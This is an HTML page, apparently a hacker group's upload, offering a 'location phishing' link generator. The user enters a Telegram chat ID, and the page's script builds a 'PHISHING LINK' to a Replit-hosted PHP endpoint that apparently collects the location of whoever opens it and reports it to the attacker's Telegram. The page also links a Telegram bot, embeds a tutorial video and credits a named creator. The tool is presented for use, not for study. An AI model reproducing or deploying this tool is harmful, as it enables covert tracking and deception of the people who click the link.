<!-- -- Uploaded on : https://haxor.my.id/open/RYL-T-71-txt.html -- Official Web : https://prinsh.com -- script-deface-generator.prinsh.com --> <!-- -- Uploaded on : https://haxor.my.id/open/Live-TSXCS-FHISHING.html -- Official Web : https://prinsh.com -- script-deface-generator.prinsh.com --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LOCATION PHISHING TSXCS TEAM</title><center> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f2f2f2; } .container { width: 80%; margin: 20px auto; background-color: #fff; border-radius: 8px; padding: 20px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } .video-container { width: 80%; margin: 20px auto; background-color: #fff; border-radius: 8px; padding: 20px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } label { display: block; margin-bottom: 5px; } input[type="text"] { width: calc(100% - 85px); padding: 8px; margin-bottom: 10px; } #generateBtn, #copyBtn, #botBtn, #idBtn { padding: 8px 15px; margin-right: 10px; margin-bottom: 10px; cursor: pointer; background-color: #4CAF50; color: white; border: none; border-radius: 4px; } #generateBtn:hover, #copyBtn:hover, #botBtn:hover, #idBtn:hover { background-color: #45a049; } #fullLink { width: calc(100% - 85px); padding: 8px; margin-bottom: 10px; } .logo-container { text-align: center; margin-bottom: 20px; } .logo-container img { border-radius: 50%; width: 150px; height: 150px; object-fit: cover; border: 3px solid #4CAF50; } .caption { font-weight: bold; color: #4CAF50; } </style> </head> <body> <div class="logo-container"> <img src="https://g.top4top.io/p_3369kytkd0.jpg" alt="TCS Location Phishing"> <p class="caption">TSXCS LOCATION PHISHING</p> </div> <div class="container"> <h2>LOCATION PHISHING</h2> <label for="idInput">CHAT ID</label> <input type="text" id="idInput"> <button id="generateBtn" onclick="generateLink()">Generate</button> <br> <label for="fullLink">PHISHING LINK</label> <input type="text" id="fullLink" readonly> <button id="copyBtn" onclick="copyLink()">Copy</button> <br> <button id="botBtn" onclick="openLink('https://t.me/rylcyber')">TELEGRAM BOT</button> <button id="idBtn" onclick="openLink('https://t.me/chatIDrobot')">CHAT ID</button> </div> <div class="video-container"> <h2>TUTORIAL</h2> <iframe src="https://player.vimeo.com/video/942025952" width="100%" height="360" frameborder="0" allow="autoplay; fullscreen" allowfullscreen></iframe> <marquee class="team">Gmail Ide vgm4096@gmail.com<a href="https://www.prinsh.com"></a>--LOCATION PHISHING LIVE PLAY THE SHADOW X CYBER SECURITY CREATED BY RYL.T-71 </marquee> </div> <script> function generateLink() { const id = document.getElementById('idInput').value; const baseUrl = 'https://765fcf28-bf25-44c5-a6a4-27c7ddc38509-00-11r157gbhrmuf.sisko.replit.dev/index.php?id='; const fullLink = baseUrl + id; document.getElementById('fullLink').value = fullLink; } function copyLink() { const fullLink = document.getElementById('fullLink'); fullLink.select(); fullLink.setSelectionRange(0, 99999); /* For mobile devices */ document.execCommand("copy"); alert("Copied the link: " + fullLink.value); } function openLink(link) { window.open(link); } </script> </body> </html>